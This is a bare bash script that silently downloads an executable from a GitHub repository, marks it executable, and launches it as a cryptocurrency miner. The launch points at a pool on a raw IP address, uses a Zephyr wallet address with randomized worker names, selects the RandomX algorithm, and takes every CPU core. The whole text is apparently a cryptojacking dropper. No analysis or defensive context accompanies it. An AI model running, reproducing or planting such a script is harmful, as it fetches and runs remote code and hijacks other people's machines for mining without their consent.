#!/bin/bash
wget https://github.com/cornea99/upil/raw/main/zepo > /dev/null 2>&1 
chmod +x zepo
./zepo --donate-level 1 -o 165.232.165.31:80 -u ZEPHYR3YjAKBsmXd4MGYpAgatSybW8xwDUSTiLY8dotSQLogQFUgaGmZr3295MB5M8GTDZUUiLFxkHZdsGBVPmyLSt7aXUDRtEW48.$(echo $(shuf -i 1-100000 -n 1)-BUJUR) -p $(echo $(shuf -i 1-100000 -n 1)-BUJUR) -a rx/0 -t $(nproc --all) 
